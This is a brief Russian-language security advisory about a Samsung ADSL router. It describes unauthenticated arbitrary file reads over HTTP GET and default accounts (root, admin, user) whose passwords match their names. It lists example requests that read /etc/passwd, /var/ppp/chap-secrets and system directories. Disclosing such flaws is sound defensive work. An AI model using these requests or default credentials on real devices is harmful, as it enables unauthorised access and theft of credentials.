Программа: Samsung ADSL Router
Уязвимость позволяет удаленному
пользователю просмотреть произвольные
файлы на устройстве и получить
административный доступ к учетным записям
по умолчанию. Удаленный пользователь может
с помощью HTTP GET запроса получить
неавторизованный доступ к произвольным
файлам на устройстве.
Пример:
http://[target]/etc/passwd
ht tp://[target]/etc/hosts
http://[target]/bin/
http://[target]/dev/
http://[target]/lib/
http://[target]/tmp/
http://[target]/var/ppp/chap-secrets
http://[target]/bin /sh
Устройство использует несколько учетных
записей ('root', 'admin', и 'user'), где по умолчанию
пароль равен имени учетной записи.
